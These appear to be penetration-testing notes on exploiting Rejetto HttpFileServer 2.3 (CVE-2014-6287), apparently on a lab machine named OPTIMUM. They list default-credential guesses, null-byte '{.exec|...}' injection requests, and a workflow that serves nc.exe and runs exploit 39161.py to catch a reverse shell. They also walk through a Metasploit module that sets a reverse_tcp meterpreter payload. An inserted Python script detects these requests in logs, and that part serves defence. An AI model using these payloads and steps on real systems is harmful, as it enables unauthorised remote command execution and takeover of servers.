HttpFileServer (HFS)
Basics
Webserver designed for publishing and sharing files
Developed by Rejetto
http://10.x.x.x .. Port 80 HttpFileServer (HFS 2.3)
Password Guessing
admin:admin
admin:password
root:password
root:root
admin:fileserver
HFS 2.3 Remote Command Execution (RCE)
HFS 2.3 is vulnerable to remote command execution.
Cause: a poor regex in the file ParserLib.pas.
A %00 (null byte) sequence in a search action allows arbitrary programs to be executed.
The null byte terminates the regular expression match but not the entire string.
HFS has settings to secure against searching with { } . |
Explore HFS
Google: HTTPFileServer Exploit
GET /?search=%00 HTTP/1.1 ..original
GET /?search=%00{.exec|ping 10.10.10.14 HTTP/1.1 ..ping
GET /?search=%00{.exec|ping 10.10.10.14.} HTTP/1.1 ..better
tcpdump -i tun0 ..confirm pings
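Detection side of the search requests above, as an added example (not part of the original notes or of HFS): it scans web or proxy log lines for a decoded null byte in the search parameter followed by the macro characters. The combined log format, the function names and the verdict labels are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl

# Macro characters the notes list ({ } . |), matched as "{." / ".}" / "|".
MACRO_MARKER = re.compile(r"\{\.|\.\}|\|")
# Request line of a combined-format log entry (assumed format); target may hold raw spaces.
REQUEST_LINE = re.compile(r'"[A-Z]+ (\S.*?) HTTP/\d\.\d"')
SEVERITY = ["macro-in-search", "nullbyte-probe", "nullbyte-then-macro"]  # low -> high

def classify_value(value):
    """Classify one decoded search value; None means nothing suspicious."""
    nul = value.find("\x00")  # parse_qsl has already turned %00 into a NUL character
    if nul == -1:
        return "macro-in-search" if MACRO_MARKER.search(value) else None
    # Markers after the NUL are the part the notes say the regex never reaches.
    if MACRO_MARKER.search(value, nul + 1):
        return "nullbyte-then-macro"
    return "nullbyte-probe"

def classify_target(target):
    """Return the most severe verdict over all search= parameters in a request target."""
    query = target.partition("?")[2]
    hits = [classify_value(v) for k, v in parse_qsl(query, keep_blank_values=True)
            if k.lower() == "search"]
    hits = [h for h in hits if h]
    return max(hits, key=SEVERITY.index) if hits else None

def scan(lines):
    """Return (line_number, verdict) for every log line that matches."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        verdict = classify_target(match.group(1)) if match else None
        if verdict:
            findings.append((number, verdict))
    return findings

# Constructed sample log lines, not taken from a real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?search=report HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /?search=%00 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:01:05 +0000] "GET /?search=%00{.exec|ping 10.10.10.14.} HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:02:00 +0000] "GET /?search=a|b HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:03:00 +0000] "GET /files/a|b.txt HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(number, verdict)
```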
Easy Exploit (no msf)
searchsploit rejetto
vim 39161.py ..fix localip/port
cp nc.exe . ..prep payload
python -m SimpleHTTPServer 80 ..share
http://$MyIP:80/nc.exe ..confirm path
python 39161.py <IP> <Port> ..method
python 39161.py 10.x.x.x 80 ..exploit (try 4x)
nc -nvlp 4444 ..listen
Rejetto v2.3 RCE - Metasploit
rejetto_hfs_exec
CVE-2014-6287
--------------------
Google
httpfileserver vulnerability
httpfileserver metasploit
httpfileserver CVE
Found... "Remote Code Execution", Rejetto, CVE-2014-6287
--------------------
Metasploit
> searchsploit HTTPFileServer .. nothing
> searchsploit HFS .. Rejetto HTTP v2.3
> msfconsole
> search rejetto
> use exploit/windows/http/rejetto_hfs_exec
> show options
> set RHOST $IP
> set LHOST $MyIP
> set SRVHOST $MyIP
> set LPORT 5555
> run
Meterpreter 64
Session is 32 bit, but Server is 64
Set a new Payload
> sysinfo
Computer: OPTIMUM
OS: Windows 2012 R2
Arch: x64 ..64 bit
Meterpreter: x86/Windows ..32 bit
> background
msf> show options
msf> set payload windows/x64/meterpreter/reverse_tcp ..new Payload
msf> set LPORT 51001 ..new Port
msf> run ..connected!